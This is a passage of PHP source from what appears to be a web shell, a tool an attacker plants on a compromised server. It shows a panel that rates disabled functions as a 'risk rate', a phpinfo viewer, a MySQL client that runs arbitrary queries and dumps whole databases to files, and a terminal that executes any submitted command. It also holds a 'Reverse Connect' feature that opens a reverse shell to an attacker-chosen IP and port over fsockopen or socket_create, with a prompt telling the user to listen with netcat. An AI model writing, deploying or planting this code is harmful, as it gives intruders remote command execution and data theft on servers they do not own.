color=orange>OFF</font></center>\";\r\n\t\t\t\t\t\$off[]=\$fuck;\r\n\t\t\t\t\t\$disable++;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t\$table.=\"</td></tr>\";\r\n\t\t}\r\n\r\n\t\t\$risk=(\$enable/\$total)*100;\r\n\t\t\$secure=(\$disable/\$total)*100;\r\n\r\n\t\tprintf(\"<h2 style='text-align:center'>Sec. Info v2.0.%s</h2><br>\r\n\t\t\t<h4 style='text-align:center;color:var(--txt-color)'>Risks Rate <font color=red>[%s%%]</font> | Secure Rate <font color=green>[%s%%]</font></h4><br><br>\r\n\t\t\t<div class='auto-number'>\r\n\t\t\t\t<table class='table sortable'>\r\n\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t<th class='sorttable_nosort' width='15'>No.</th>\r\n\t\t\t\t\t\t\t<th>Disable Function</th>\r\n\t\t\t\t\t\t\t<th>Status</th>\r\n\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t</thead>\r\n\t\t\t\t\t<tbody>\r\n\t\t\t\t\t\t%s\r\n\t\t\t\t\t</tbody>\r\n\t\t\t\t</table>\r\n\t\t\t\t<fieldset style='margin-bottom:15px'>\r\n\t\t\t\t\t<legend>Ready List</legend>\r\n\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t</fieldset>\r\n\t\t\t\t<div class='divide'>\r\n\t\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t\t<fieldset style='margin-bottom:15px'>\r\n\t\t\t\t\t\t\t<legend>Off List</legend>\r\n\t\t\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t\t\t</fieldset>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t\t<legend>Die List</legend>\r\n\t\t\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t\t\t</fieldset>\r\n\t\t\t\t\t</div>\r\n\t\t\t</div>\",\$total,round(\$risk,2),round(\$secure,2),\$table,implode(\$ready, ', '),implode(\$off, ', '),implode(\$die, ', '));\r\n\t}\r\n\tif(\$_REQUEST['x']==\"info\")\r\n\t{\r\n\t\tprintf(\"<div id='php-configuration'>\r\n\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t<select id='php-config'>\r\n\t\t\t\t\t<option value='4'>INFO_CONFIGURATION</option>\r\n\t\t\t\t\t<option value='16' selected>INFO_ENVIRONMENT</option>\r\n\t\t\t\t\t<option value='32'>INFO_VARIABLES</option>\r\n\t\t\t\t\t<option value='8'>INFO_MODULES</option>\r\n\t\t\t\t\t<option value='1'>INFO_GENERAL</option>\r\n\t\t\t\t\t<option value='2'>INFO_CREDITS</option>\r\n\t\t\t\t\t<option value='64'>INFO_LICENSE</option>\r\n\t\t\t\t\t<option value='-1'>INFO_ALL</option>\r\n\t\t\t\t</select>\r\n\t\t\t\t<input type='submit' onclick=\\\"return getAjax(true,'php-info','POST','?x=info&xa=envirolment&config='+document.getElementById('php-config').value);\\\"/><br>\r\n\t\t\t</form>\r\n\t\t</div>\r\n\t\t<div id='php-info' class='result'></div>\");\r\n\r\n\t\t\$cores=array('PHP_VERSION','PHP_MAJOR_VERSION','PHP_MINOR_VERSION','PHP_RELEASE_VERSION','PHP_VERSION_ID',\r\n\t\t\t\t 'PHP_EXTRA_VERSION','PHP_ZTS','PHP_DEBUG','PHP_MAXPATHLEN','PHP_OS','PHP_OS_FAMILY','PHP_SAPI',\r\n\t\t\t\t 'PHP_EOL','PHP_INT_MAX','PHP_INT_MIN','PHP_INT_SIZE','PHP_FLOAT_DIG','PHP_FLOAT_EPSILON',\r\n\t\t\t\t 'PHP_FLOAT_MIN','PHP_FLOAT_MAX','DEFAULT_INCLUDE_PATH','PEAR_INSTALL_DIR','PEAR_EXTENSION_DIR',\r\n\t\t\t\t 'PHP_EXTENSION_DIR','PHP_PREFIX','PHP_BINDIR','PHP_BINARY','PHP_MANDIR','PHP_LIBDIR','PHP_DATADIR',\r\n\t\t\t\t 'PHP_SYSCONFDIR','PHP_LOCALSTATEDIR','PHP_CONFIG_FILE_PATH','PHP_CONFIG_FILE_SCAN_DIR',\r\n\t\t\t\t 'PHP_SHLIB_SUFFIX','PHP_FD_SETSIZE');\r\n\r\n\t\t\$table=\"\";\r\n\t\tforeach(\$cores as \$core)\r\n\t\t{\r\n\t\t\t\$table.=\"<tr><td>\".\$core.\"</td><td>\".@constant(\$core).\"</td></tr>\";\r\n\t\t}\r\n\r\n\t\tprintf(\"<h2>Core Predefined Constants</h2><br>\r\n\t\t\t\t<table class='table'>\r\n\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t<th>Predefined Constants</th>\r\n\t\t\t\t\t\t\t<th>Value</th>\r\n\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t</table>\",\$table);\r\n\r\n\t\tif(any(\"xa\",\$_REQUEST)&&\$_REQUEST['xa']==\"envirolment\")\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\tphpinfo(\$_REQUEST['config']);\r\n\t\t\t\$phpinfo=ob_get_contents();\r\n\t\t\tob_end_clean();\r\n\t\t\t\$phpinfo=preg_replace('%^.*<body>(.*)</body>.*\$%ms','\$1',\$phpinfo);\r\n\t\t\tprintf(\"<div id='phpinfo'>%s</div>\",\$phpinfo);\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$_REQUEST['x']==\"db\")\r\n\t{\r\n\t\t\$connect=any(\"connect\",\$_SESSION)?\$_SESSION['connect']:\"\";\r\n\t\t\$status=any(\"status\",\$_SESSION)?\$_SESSION['status']:\"\";\r\n\t\t\$query=any(\"query\",\$_REQUEST)?\$_REQUEST['query']:\"show databases;\";\r\n\r\n\t\tif(\$connect==true)\r\n\t\t{\r\n\t\t\t\$process=\"\";\r\n\t\t\t\$sql=mysqli_connect(\$_SESSION['host'],\$_SESSION['user'],\$_SESSION['pass'],\$_SESSION['dbas'],\$_SESSION['port']);\r\n\t\t\t/* \r\n\t\t\t\$result=mysql_list_processes(\$sql);\r\n\t\t\twhile(\$row=mysql_fetch_assoc(\$result))\r\n\t\t\t{\r\n\t\t\t \$process.=sprintf(\"<tr>\r\n\t\t\t \t<td>%s</td><td>%s</td><td>%s</td>\r\n\t\t\t \t<td>%s</td><td>%s</td></tr>\",\r\n\t\t\t \t\$row[\"Id\"],\$row[\"Host\"],\$row[\"db\"],\r\n\t\t\t \t\$row[\"Command\"],\$row[\"Time\"]);\r\n\t\t\t}\r\n\t\t\tmysql_free_result(\$result); \r\n\t\t\t*/\r\n\t\t\t\r\n\t\t\tprintf(\"<div class='database-session'>\r\n\t\t\t\t\t\t<div class='database-query'>\r\n\t\t\t\t\t\t\t<form action='?x=db&xa=qry' method='post'>\r\n\t\t\t\t\t\t\t\t<label>MYSQL Query<hr></label><br>\r\n\t\t\t\t\t\t\t\t<label><i style='color:#222'>\r\n\t\t\t\t\t\t\t\tshow databases;<br>\r\n\t\t\t\t\t\t\t\tshow tables from {database};<br>\r\n\t\t\t\t\t\t\t\tshow columns from {database}.{table};<br>\r\n\t\t\t\t\t\t\t\tselect count(*) from {database}.{table};<br>\r\n\t\t\t\t\t\t\t\tselect * from {database}.{table}limit 0,10;</i></label>\r\n\t\t\t\t\t\t\t\t<textarea id='query' name='query'>%s</textarea><br>\r\n\t\t\t\t\t\t\t\t<input type='submit' name='disconnect' value='Disconnect'/>\r\n\t\t\t\t\t\t\t\t<input type='submit' value='Execute'/>\r\n\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='database-process'>\r\n\t\t\t\t\t\t\t<!-- div class='mysql-process-result'>\r\n\t\t\t\t\t\t\t\t<label>Database Process <a href='?x=db&xa=proc'>♻</a><hr></label>\r\n\t\t\t\t\t\t\t\t<table class='table table-bordered'>\r\n\t\t\t\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Id</th>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Host</th>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Database</th>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Command</th>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Time</th>\r\n\t\t\t\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t\t</div -->\r\n\t\t\t\t\t\t\t<div class='database-dump'>\r\n\t\t\t\t\t\t\t\t<label>Database Dump<hr></label>\r\n\t\t\t\t\t\t\t\t<form action='?x=db&xa=dmp' method='post'><br>\r\n\t\t\t\t\t\t\t\t\t<label>Database</label><input type='text' name='database' value=''/><br>\r\n\t\t\t\t\t\t\t\t\t<label>Output</label><input type='text' name='output' value='%s'/><br>\r\n\t\t\t\t\t\t\t\t\t<input type='submit' value='Dump' />\r\n\t\t\t\t\t\t\t\t\t<label>%s</label>\r\n\t\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='clr'></div>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t\",\$query,\$process,\$dir,\$status);\r\n\t\t\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tprintf(\"<div id='database'>\r\n\t\t\t\t\t<form action='?x=db&xa=db' method='post' class='new'><br>\r\n\t\t\t\t\t\t<label>Host</label><input type='text' name='host' value='localhost'/><br>\r\n\t\t\t\t\t\t<label>Port</label><input type='text' name='port' value='3306'/><br>\r\n\t\t\t\t\t\t<label>Username</label><input type='text' name='user' value='root'/><br>\r\n\t\t\t\t\t\t<label>Password</label><input type='text' name='pass' value=''/><br>\r\n\t\t\t\t\t\t<label>Database</label><input type='text' name='dbas' value=''/><br>\r\n\t\t\t\t\t\t<input type='submit' value='Connect'/>\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>\");\r\n\t\t}\r\n\r\n\t\tif(any(\"rs\",\$_REQUEST))\r\n\t\t{\r\n\t\t\t\$_SESSION[\$_REQUEST['rs']]='';\r\n\t\t}\r\n\r\n\t\tif(any(\"cd\",\$_REQUEST))\r\n\t\t{\r\n\t\t\t\$_SESSION['qdb']=\$_REQUEST['cd'];\r\n\t\t}\r\n\r\n\t\tif(any(\"ct\",\$_REQUEST))\r\n\t\t{\r\n\t\t\t\$_SESSION['qtb']=\$_REQUEST['ct'];\r\n\t\t}\r\n\r\n\t\tif(any(\"xa\",\$_REQUEST)&&\$_REQUEST['xa']==\"db\")\r\n\t\t{\t\r\n\t\t\t\$cn=mysqli_connect(\$_REQUEST['host'],\$_REQUEST['user'],\$_REQUEST['pass'],\$_REQUEST['dbas'],\$_REQUEST['port']);\r\n\r\n\t\t\t\$_SESSION['host']=\$_REQUEST['host'];\r\n\t\t\t\$_SESSION['port']=\$_REQUEST['port'];\r\n\t\t\t\$_SESSION['user']=\$_REQUEST['user'];\r\n\t\t\t\$_SESSION['pass']=\$_REQUEST['pass'];\r\n\t\t\t\$_SESSION['dbas']=\$_REQUEST['dbas'];\r\n\r\n\t\t\tif(\$cn)\r\n\t\t\t{\r\n\t\t\t\t\$_SESSION['connect']=true;\r\n\t\t\t\theader('location:'.php_self.'?x=db');\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$_SESSION['connect']=false;\r\n\t\t\t\tprintf(\"<b class='off'>Connection Failed</b>\");\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(any(\"xa\",\$_REQUEST)&&\$_REQUEST['xa']==\"qry\")\r\n\t\t{\r\n\t\t\t\$_SESSION['status']='';\r\n\t\t\t\$con=mysqli_connect(\$_SESSION['host'],\$_SESSION['user'],\$_SESSION['pass'],\$_SESSION['dbas'],\$_SESSION['port']);\r\n\r\n\t\t\tif(isset(\$_REQUEST['disconnect']))\r\n\t\t\t{\r\n\t\t\t\tmysqli_close(\$con);\r\n\t\t\t\tunset(\$_SESSION['connect']);\r\n\t\t\t\tunset(\$_SESSION['query']);\r\n\t\t\t\tunset(\$_SESSION['host']);\r\n\t\t\t\tunset(\$_SESSION['user']);\r\n\t\t\t\tunset(\$_SESSION['pass']);\r\n\t\t\t\tunset(\$_SESSION['dbas']);\r\n\t\t\t\tunset(\$_SESSION['qdb']);\r\n\t\t\t\tunset(\$_SESSION['qtb']);\r\n\t\t\t\theader('location:'.php_self.'?x=db');\r\n\t\t\t}\r\n\r\n\t\t\t\$sql=!empty(\$_REQUEST['query'])?\$_REQUEST['query']:\"show databases;\";\r\n\t\t\t\$result=mysqli_query(\$con,\$sql);\r\n\t\t\t\$data=array();\r\n\t\t\t\$name=array();\r\n\r\n\t\t\tif(\$result)\r\n\t\t\t{\r\n\t\t\t\twhile(\$fieldinfo=mysqli_fetch_field(\$result))\r\n\t\t\t\t{\r\n\t\t\t\t\t\$name[]=\$fieldinfo->name;\r\n\t\t\t\t}\r\n\t\t\t\t\$data[]=\$name;\r\n\t\t\t\twhile(\$row=mysqli_fetch_row(\$result))\r\n\t\t\t\t{\r\n\t\t\t\t\t\$data[]=\$row;\r\n\t\t\t\t}\r\n\t\t\t\tmysqli_free_result(\$result);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$data=false;\r\n\t\t\t}\r\n\r\n\t\t\tif(\$data!==false)\r\n\t\t\t{\r\n\t\t\t\t\$sqdb=isset(\$_SESSION['qdb']) ? \$_SESSION['qdb'] : '';\r\n\t\t\t\t\$sqtb=isset(\$_SESSION['qtb']) ? \$_SESSION['qtb'] : '';\r\n\r\n\t\t\t\t\$bsdb=\"<a href='?x=db&xa=qry&rs=qdb&query=show databases;'>Database</a>\";\r\n\t\t\t\t\$bqdb=!empty(\$_SESSION['qdb'])?\"→\t<a href='?x=db&xa=qry&rs=qtb&query=show tables from \$sqdb;'>\$sqdb</a>\":\"\";\r\n\t\t\t\t\$bqtb=!empty(\$_SESSION['qtb'])?\"→\t<a href='?x=db&xa=qry&query=show columns from \$sqdb.\$sqtb;'>\$sqtb</a>\":\"\";\r\n\r\n\t\t\t\tprintf(\"<div class='database=table'>\r\n\t\t\t\t\t\t<div class='database-breadcrumb'>%s %s %s</div>\r\n\t\t\t\t\t\t<div class='auto-number'>\r\n\t\t\t\t\t\t<table class='table sortable'>\",\$bsdb,\$bqdb,\$bqtb);\r\n\r\n\t\t\t\tforeach(\$data as \$key => \$val)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(is_array(\$val))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(\$key==0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tprint \"<tr><th class='sorttable_nosort'>☰</th>\";\r\n\t\t\t\t\t\t\tforeach(\$val as \$key2 => \$val2)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif(!is_array(\$val2))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprint \"<th>\".\$val2.\"</th>\";\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tprint \"</tr>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tprint \"<tr><td width='15'></td>\";\r\n\t\t\t\t\t\t\tforeach(\$val as \$key3 => \$val3)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif(!is_array(\$val3))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tif(strpos(\$val2,'Database')!==false)\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\tprint \"<td><a href='?x=db&xa=qry&cd=\$val3&query=show tables from \$val3;'>\$val3</a></td>\";\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\telseif(strpos(\$val2,'Tables')!==false)\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\$val4=substr(\$val2,strpos(\$val2,'Tables_in_')+10);\r\n\t\t\t\t\t\t\t\t\t\tprint \"<td><a href='?x=db&xa=qry&cd=\$val4&ct=\$val3&query=select * from \$val4.\$val3 limit 0,10;'>\$val3</a></td>\";\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\tprint \"<td>\$val3</td>\";\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tprint \"</tr>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tprint \"</table></div></div>\";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tprint '<span class=off>Query not Executed</span>';\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(any(\"xa\",\$_REQUEST)&&\$_REQUEST['xa']==\"dmp\")\r\n\t\t{\r\n\t\t\t\$database=\$_REQUEST['database'];\r\n\t\t\t\$output=\$_REQUEST['output'];\r\n\t\t\tif (!file_exists(\$output)&&!empty(\$database)) \r\n\t\t\t{\r\n\t\t\t\t\$link=mysqli_connect(\$_SESSION['host'],\$_SESSION['user'],\$_SESSION['pass'],null,\$_SESSION['port']);\r\n\t\t\t\tmysqli_set_charset(\$link,'utf8');\r\n\t\t\t\tmysqli_select_db(\$link,\$database);\r\n\t\t\t\t\$tables=array();\r\n\t\t\t\t\$result=mysqli_query(\$link,'SHOW TABLES');\r\n\t\t\t\twhile(\$row=mysqli_fetch_row(\$result))\r\n\t\t\t\t{\r\n\t\t\t\t\t\$tables[]=\$row[0];\r\n\t\t\t\t}\r\n\t\t\t\t\$return='SET FOREIGN_KEY_CHECKS=0;' . \"\\r\\n\";\r\n\t\t\t\t\$return.='SET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";' . \"\\r\\n\";\r\n\t\t\t\t\$return.='SET AUTOCOMMIT=0;' . \"\\r\\n\";\r\n\t\t\t\t\$return.='START TRANSACTION;' . \"\\r\\n\";\r\n\t\t\t\tforeach(\$tables as \$table)\r\n\t\t\t\t{\r\n\t\t\t\t\t\$result=mysqli_query(\$link,'SELECT * FROM '.\$table);\r\n\t\t\t\t\t\$num_fields=mysqli_num_fields(\$result);\r\n\t\t\t\t\t\$num_rows=mysqli_num_rows(\$result);\r\n\t\t\t\t\t\$i_row=0;\r\n\t\t\t\t\t\$row2=mysqli_fetch_row(mysqli_query(\$link,'SHOW CREATE TABLE '.\$table));\r\n\t\t\t\t\t\$return.=\"\\n\\n\".\$row2[1].\";\\n\\n\";\r\n\t\t\t\t\tif (\$num_rows!==0) {\r\n\t\t\t\t\t\t\$row3=@mysqli_fetch_fields(\$result);\r\n\t\t\t\t\t\t\$return.='INSERT INTO '.\$table.'( ';\r\n\t\t\t\t\t\tforeach (\$row3 as \$th) \r\n\t\t\t\t\t\t{ \r\n\t\t\t\t\t\t\t\$return.='`'.\$th->name.'`,';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\$return=substr(\$return,0,-2);\r\n\t\t\t\t\t\t\$return.=' ) VALUES';\r\n\t\t\t\t\t\tfor (\$i=0;\$i < \$num_fields;\$i++) \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\twhile(\$row=mysqli_fetch_row(\$result))\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\$return.=\"\\n(\";\r\n\t\t\t\t\t\t\t\tfor(\$j=0;\$j<\$num_fields;\$j++) \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\$row[\$j]=addslashes(\$row[\$j]);\r\n\t\t\t\t\t\t\t\t\t\$row[\$j]=preg_replace(\"#\\n#\",\"\\\\n\",\$row[\$j]);\r\n\t\t\t\t\t\t\t\t\tif (isset(\$row[\$j])) { \$return.='\"'.\$row[\$j].'\"';}else { \$return.='\"\"';}\r\n\t\t\t\t\t\t\t\t\tif (\$j<(\$num_fields-1)) { \$return.=',';}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\tif (++\$i_row==\$num_rows) {\r\n\t\t\t\t\t\t\t\t\t\$return.=\");\";\r\n\t\t\t\t\t\t\t\t}else {\r\n\t\t\t\t\t\t\t\t\t\$return.=\"),\";\r\n\t\t\t\t\t\t\t\t} \r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\$return.=\"\\n\\n\\n\";\r\n\t\t\t\t}\r\n\t\t\t\t\$return .='SET FOREIGN_KEY_CHECKS=1;' . \"\\r\\n\";\r\n\t\t\t\t\$return.='COMMIT;';\r\n\t\t\t\t\$output=pathinfo(\$otput)['extension']=='sql'?\$output:\$output.'.sql';\r\n\t\t\t\t\$handle=fopen(\$output,'w+');\r\n\t\t\t\tfwrite(\$handle,\$return);\r\n\t\t\t\tfclose(\$handle);\r\n\t\t\t\t\$_SESSION['status']=sprintf(\"Dump with success... <a href='?a=v&r=%s' target='_blank'>'%s'</a>\",urle(\$output),basename(\$output));\t \r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$_SESSION['status']=\"<span class=off>Dump Error</span>\";\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\theader('location:'.php_self.'?x=db');\r\n\t\t}\r\n\r\n\t}\r\n\tif(\$_REQUEST['x']==\"terminal\")\r\n\t{\r\n\t\tprintf(\"\r\n\t\t\t<div id='terminal'>\r\n\t\t\t\t<textarea id='prompt-terminal' class='cmd' cols='122' rows='20' readonly>%s</textarea>\r\n\t\t\t\t<form onsubmit='return false;'>\r\n\t\t\t\t\t<label id='curdir-terminal'>\$ %s:</label>\r\n\t\t\t\t\t<input type='text' id='terminal-input' autocomplete='off' onfocus=\\\"\\\" onkeydown=\\\"\r\n\t\t\t\t\t\tif(event.keyCode==13) \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\ttemp=this.value;\r\n\t\t\t\t\t\t\tthis.value='';\r\n\t\t\t\t\t\t\tgetAjax(true,'curdir-terminal','POST','?x=terminal&xa=terminals-curdir&cmd='+temp);\r\n\t\t\t\t\t\t\treturn getAjax(false,'prompt-terminal','POST','?x=terminal&xa=terminals&cmd='+temp);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\\\" class='cmd' name=cmd cols=122 rows=2></input>\r\n\t\t\t\t</form>\r\n\t\t\t</div>\",Execute('whoami'),\$dir);\r\n\r\n\t\tif(any(\"xa\",\$_REQUEST)&&\$_REQUEST['xa']==\"terminals\")\r\n\t\t{\t\r\n\t\t\tob_clean();\r\n\t\t\t\$command=!empty(\$_REQUEST['cmd'])?\$_REQUEST['cmd']:\"whoami\";\r\n\t\t\t@chdir(\$dir);\r\n\t\t\t\$charset='UTF-8';\r\n\t\t\tif(!Unix())\r\n\t\t\t{\r\n\t\t\t\t\$charset='Windows-1251';\r\n\t\t\t}\r\n\t\t\t\$ret=iconv(\$charset,'UTF-8',Execute(\$command));\r\n\t\t\tprint \$ret;\r\n\t\t\texit;\r\n\t\t}\r\n\t\telseif(any(\"xa\",\$_REQUEST)&&\$_REQUEST['xa']==\"terminals-curdir\")\r\n\t\t{\t\r\n\t\t\tob_clean();\r\n\t\t\t\$command=!empty(\$_REQUEST['cmd'])?\$_REQUEST['cmd']:\"whoami\";\r\n\t\t\tif (preg_match('/cd (.*)/',\$command,\$dirx))\r\n\t\t\t{\r\n\t\t\t\tif (\$dirx[1]=='..')\r\n\t\t\t\t{\r\n\t\t\t\t\t\$dir=substr(\$dir,0,strrpos(\$dir,_));\r\n\t\t\t\t\tif (strlen(\$dir)<=2) \$dir=\$dir._;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tif (is_dir(\$dirx[1]))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\$dir=realpath(\$dirx[1]);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t\$_SESSION['c']=urle(\$dir);\r\n\t\t\tprint '\$ '.\$dir.':';\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$_REQUEST['x']==\"connect\")\r\n\t{\r\n\t\tprintf(\"<div id='connect'>\r\n\t\t\t\t<div class='connect-left'>\r\n\t\t\t\t\t<div class='Reverse-connect'>\r\n\t\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t\t<legend>Reverse Connect</legend>\r\n\t\t\t\t\t\t\t<form action='?x=connect&xa=reverse-connect' method='post' onsubmit=\\\"\r\n\t\t\t\t\t\t\t\treturn confirm('HOST will FUCKED ON ur PC or LAPTOP ?!\\\\nMake Sure ur FIREWALL OFF ?!\\\\nUSE NETCAT {nc -lvp ' + document.getElementById('reverse-port').value+'}\\\\n\\\\nTYPE \\'exit\\' or \\'quit\\' to TERMINATE')\\\">\r\n\t\t\t\t\t\t\t\t<label>Remote Ip</label><input type='text' name='reverse-ip' value='%s'/><br>\r\n\t\t\t\t\t\t\t\t<label>Remote Port</label><input type='text' id='reverse-port' name='reverse-port' value='1337'/><br>\r\n\t\t\t\t\t\t\t\t<label>Socket</label><select name='socket'>\r\n\t\t\t\t\t\t\t\t\t<option value='fsockopen'>fsockopen</option>\r\n\t\t\t\t\t\t\t\t\t<option value='socket_create'>socket_create</option>\r\n\t\t\t\t\t\t\t\t\t<option value='stream_socket_client'>stream_socket_client</option>\r\n\t\t\t\t\t\t\t\t</select><br>\r\n\t\t\t\t\t\t\t\t<input type='submit' value='Connect' />\r\n\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t</fieldset>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='connect-right'>\r\n\t\t\t\t\t<div class='status-connect'>\r\n\t\t\t\t\t\t<fieldset>\r\n \t\t\t\t\t\t\t<legend>Status</legend>\r\n\t\t\t\t\t\t\t<div id='connect-result'>Terminal: %s\",\r\n\t\t\t\t\t\t\tremote_addr,Execute('whoami') \r\n\t\t);\r\n\r\n\t\tif(any(\"xa\",\$_REQUEST)&&\$_REQUEST['xa']==\"reverse-connect\")\r\n\t\t{\r\n\t\t\tif(\$_REQUEST['socket']==\"fsockopen\")\r\n\t\t\t{\r\n\t\t\t\t\$host=\$_REQUEST['reverse-ip'];\r\n\t\t\t\t\$port=\$_REQUEST['reverse-port'];\r\n\t\t\t\t\$sock=@fsockopen(\$host,\$port,\$errno,\$errstr);\r\n\t\t\t\tif(\$errno!=0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"<font color='red'><b>%s</b>:%s</font>\",\$errno,\$errstr);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\twhile(!feof(\$sock)) \r\n\t\t\t\t {\r\n\t\t\t\t \tfwrite(\$sock,\"[b4tm4n]:\");\r\n\t\t\t\t \$command=fgets(\$sock,1024);\r\n\t\t\t\t if(trim(\$command)=='quit'||trim(\$command)=='exit')\r\n\t\t\t\t\t {\r\n\t\t\t\t\t \tfclose(\$sock);\r\n\t\t\t\t\t \tprintf(\$command);\r\n\t\t\t\t\t \texit;\r\n\t\t\t\t\t }\r\n\t\t\t\t fwrite(\$sock,Execute(\$command));\r\n\t\t\t\t }\r\n\t\t\t\t fclose(\$sock);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse if(\$_REQUEST['socket']==\"socket_create\")\r\n\t\t\t{\r\n\t\t\t\t\$host=\$_REQUEST['reverse-ip'];\r\n\t\t\t\t\$port=\$_REQUEST['reverse-port'];\r\n\t\t\t\t\$sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);\r\n\t\t\t\tsocket_set_nonblock(\$sock);\r\n\t\t\t\tif(!\$sock)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"<font color='red'>Connection Error</font>\");\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\twhile(!@socket_connect(\$sock,\$host,\$port)) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t @socket_write(\$sock,\"[b4tm4n]:\",strlen (\"[b4tm4n]:\"));\r\n\t\t\t\t\t \$input=@socket_read(\$sock,1024,PHP_NORMAL_READ);\r\n\t\t\t\t\t if (trim(\$input)=='quit'||trim(\$input)=='exit')\r\n\t\t\t\t\t {\r\n\t\t\t\t\t \tsocket_set_block(\$sock);\r\n\t\t\t\t\t \tsocket_close(\$sock);\r\n\t\t\t\t\t \tprintf(\$input);\r\n\t\t\t\t\t \texit;\r\n\t\t\t\t\t }\r\n\t\t\t\t\t @socket_write(\$sock,Execute(\$input),strlen (Execute(\$input)));\r\n\t\t\t\t\t}\r\n\t\t\t\t\tsocket_set_block(\$sock);\r\n\t\t\t\t\tsocket_close(\$sock);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse 